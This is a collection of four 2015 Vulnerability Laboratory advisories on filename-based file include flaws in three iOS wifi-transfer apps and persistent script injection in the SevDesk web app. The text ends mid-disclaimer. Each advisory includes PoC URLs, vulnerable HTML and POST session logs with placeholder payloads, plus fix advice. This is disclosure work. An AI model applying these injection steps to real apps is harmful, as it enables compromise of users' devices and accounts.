http://www.vulnerability-lab.com/get_content.php?id=1446
Release Date:
=============
2015-03-11
Vulnerability Laboratory ID (VL-ID):
====================================
1446
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Mobile Drive is the ideal app for anyone who transfer documents between PC, iPad and Cloud. Mobile Drive allows you to manage
documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2015-03-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Keke Cai
Product: Mobile Drive HD- iOS Mobile Web Application 1.8
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Mobile Drive HD v1.8 iOS mobile application (the product named in the
title and Affected Product(s) sections). The vulnerability allows attackers who can reach the app's WiFi web service to inject local file/path
requests or system-specific path strings without authorization, in order to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable upload POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by attackers who can reach the app's WiFi web service (the exploitation technique is listed as Local and the PoC targets localhost:8080) without privileged application user accounts or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
(Note: the logged upload uses a filename containing %3Ciframe%3E, and the directory listing below renders it unencoded. What the PoC demonstrates is therefore markup/script injection through the uploaded filename; a directory-traversal read of files outside the upload directory is not shown.)
PoC: Vulnerable Source
<tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'>
<form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------21144193462
Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2739]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/jquery.js Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[55774]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[62]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mo., 09 März 2015 14:24:13 GMT]
Reference(s):
http://localhost:8080/files/
http://localhost:8080/jquery.js
Solution - Fix & Patch:
=======================
The vulnerability can be patched by strict validation of the `filename` value in the upload POST method request: reject path separators, `..`/`./` sequences and markup characters such as `<` and `>` (the PoC above uses `%3E/` inside the name), or, better, discard the client-supplied name entirely and generate the stored filename server-side.
Accept only a single allow-listed file extension so that a crafted filename cannot be turned into an arbitrary file upload.
HTML-encode the filename wherever it is written into the file directory index list, since that listing is where the unvalidated value is rendered back to the browser.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Photo Manager Pro v4.4.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1445
Release Date:
=============
2015-03-12
Vulnerability Laboratory ID (VL-ID):
====================================
1445
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-03-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
The vulnerability allows an attacker who can reach the wifi web interface to submit a crafted `filename` value (the PoC below uses a `./` path prefix) that the
application stores without validation and later appears to resolve as a file path in `disp_photo.action`, which can be used to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of
the `wifi interface` in connection with the vulnerable upload service module.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique
local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
To exploit the bug the attacker needs either access to the local device (wifi sync) or network access to the wifi web GUI.
The security risk of the local file include web vulnerability is estimated as high with a CVSS (common vulnerability scoring system) score of 6.9.
Exploitation requires no user interaction and no privileged web-application user account. Note that the session logs below carry the cookie `isenabledpasscode=false`,
i.e. the interface was tested with the optional passcode disabled; presumably in that configuration any client on the same wireless network can reach the upload module. Successful exploitation
of the local file include web vulnerability results in mobile application or device compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] upload.action
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] disp_photo.action
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by any attacker who can reach the wifi web interface, without a privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png
PoC: Vulnerable Source
<div id="photo_content">
<img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div>
--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/upload.action?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/upload.html?folderID=5]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------15932100885119
Content-Disposition: form-data; name="is_submitted"
false
-----------------------------15932100885119
Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/upload.html?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[8085]
Date[Do., 05 März 2015 20:52:18 GMT]
Reference(s):
http://localhost:8080/upload.action?folderID=
http://localhost:8080/upload.html?folderID=
http://localhost:8080/disp_photo.action?filename=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1314
Release Date:
=============
2015-03-23
Vulnerability Laboratory ID (VL-ID):
====================================
1314
Common Vulnerability Scoring System:
====================================
5.9
Product & Service Introduction:
===============================
The integrated customer management, digital customer file is the central record for a single customer. invoices, facilities and operations
to a customer are stored centrally automated in one place. So the customer file is always up to date. For faster retrieval or reporting
contacts can be tagged. In addition, with powerful. Search options you have as the entire customer base better than ever in view.
Daily backup
256bit SSL encryption
TÜV certified datacenter
Free version
No hidden costs
No minimum contract term
iPhone App
Runs in any browser
No installation required on the PC
Easy to use
Reduced to the essentials
Automated, where it is only Possible
(Copy of the Vendor Homepage: https://sevdesk.de/)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service.
Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2014-09-07: Vendor Response/Feedback (SevDesk Developer Team)
2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team)
2015-03-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SevenIT
Product: SevDesk - Web Application 3.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application.
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the
vulnerable web-application module or service.
The security vulnerability is located in the `firstname`, `surname` & `family name` values of the main sevDesk `Dashboard` application module (submitted as the
`name`, `surename` and `familyname` POST parameters of the registration form, see the session log below).
Remote attackers are able to inject own codes into the main dashboard service by manipulation of the registration name values. The execution of
the injected script code occurs on the application-side in the main dashboard module through the rightHead and feedcontent elements. The attack
vector is persistent and the request method to inject the code is POST. A user can also change the name later through the application itself,
so no administrator interaction is required for successful exploitation.
The security risk of the persistent script code injection web vulnerabilities is estimated as medium with a CVSS (common vulnerability scoring system)
score of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct
user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects
to malicious sources and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Registration to SevDesk
Vulnerable Parameter(s):
[+] surname (sent as `surename` in the registration POST)
[+] firstname (sent as `name` in the registration POST)
[+] family name (sent as `familyname` in the registration POST)
Affected Module(s):
[+] Dasboard Index - rightHead & feedcontent
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by low privileged application user accounts; the only interaction needed from a victim is viewing the dashboard or activity feed in which the injected name is rendered.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability
1. Register an account by usage of the following webpage https://my.sevdesk.de/register/
2. Include to the surname, family name and firstname your own script code as payload
3. Save the registration form and go to the website https://my.sevdesk.de/
4. Login with the user account data
5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dasboard index (rightHead < name > feedcontent)
6. Successful reproduce of the application-side security vulnerability!
PoC: rightHead > Displayname (First- & Lastname)
<div id="middleHead">
<input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." />
</div>
<div id="rightHead">
<div style="float:right;margin-top:5px;text-align: right;padding-right:5px;">
<div style="color:#fff;padding:3px;margin-bottom:2px;">
<span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div>
<a href="/admin/company">Einstellungen</a> |
<a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a>
</div>
</div>
</div>
</div>
<div id="headNav" style="top:80px;">
<div class="headwrapper">
<ul id="mainNavigation">
PoC: Verlauf > feedcontent
<div>
<div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent">
a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des
<img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf
"archiviert" geändert
</div></div><div class="clearfix"></div></div>
<div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14
--- PoC Session Logs [POST] (Registration sevDesk) ---
Status: 200[OK]
POST https://my.sevdesk.de/register/save Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html]
Request Header:
Host[my.sevdesk.de]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://my.sevdesk.de/register]
Content-Length[119]
Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411;
optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149;
__utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586;
km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]]
surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]]
familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]]
username[support%40vulnerability-lab.com]
password[chaos666]
Response Header:
Date[Tue, 02 Sep 2014 11:44:30 GMT]
Server[Apache/2.2.22 (Debian)]
X-Powered-By[PHP/5.4.4-14+deb7u7]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[94]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=utf-8]
Reference(s):
https://my.sevdesk.de/register/save
Solution - Fix & Patch:
=======================
The vulnerability can be patched by applying context-appropriate output encoding (HTML entity encoding) to the affected rightHead & feedcontent values in the dashboard application index.
Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the name values; output encoding remains the primary fix, since the names can also be changed after registration.
Note: The issue has been patched by the manufacturer since 2015-02-01
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities in the main dashboard application is estimated as medium. (CVSS 5.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1447
Release Date:
=============
2015-03-13
Vulnerability Laboratory ID (VL-ID):
====================================
1447
Common Vulnerability Scoring System:
====================================
6.3
Product & Service Introduction:
===============================
This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.
Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2015-03-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mindspeak Software
Product: Wifi Drive Pro - iOS Mobile Web Application 1.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.
The vulnerability allows an attacker who can reach the wifi web interface to submit a crafted `filename` value that the application stores and renders
without validation, which can be used to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `file upload` module. Attackers are able to upload files with malicious `filename` values
(the PoC below uses `%3C./...%3E/2.png`, i.e. `<`, `>` and an extra path component) in the `file upload` POST method request. The unvalidated name is then
written verbatim into the index file dir listing of the wifi interface, both as the link `href` and as the link text, so the injected path and markup are
reflected to every browser that opens the listing. The attacker injects the value through the `wifi interface` in connection with the vulnerable file upload POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a CVSS (common vulnerability scoring system) score of 6.3.
Exploitation requires no user interaction and no privileged web-application user account, but the attacker must be able to reach the wifi web interface
(see Exploitation Technique: Local above). Successful exploitation results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:49276/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by any attacker who can reach the wifi web interface, without a privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: GET
http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
PoC: Vulnerable Source
<p><a href="..">..</a><br>
<a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>
--- PoC Session Logs [POST] (Inject)---
Status: 200[OK]
POST http://localhost:49276/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:49276]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:49276/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------28140821932238
Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png
Reference(s):
http://localhost:49276/
http://localhost:49276//%3C./
Solution - Fix & Patch:
=======================
The vulnerability can be patched by strict validation of the `filename` value in the upload POST method request: reject path separators, `..`/`./` sequences and markup characters such as `<` and `>`, or, better, discard the client-supplied name entirely and generate the stored filename server-side.
Accept only a single allow-listed file extension so that a crafted filename cannot be turned into an arbitrary file upload.
Encode the filename when writing the file dir index list: the listing in the PoC above places it in both the `href` attribute and the link text, so the former needs attribute encoding and the latter HTML entity encoding.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
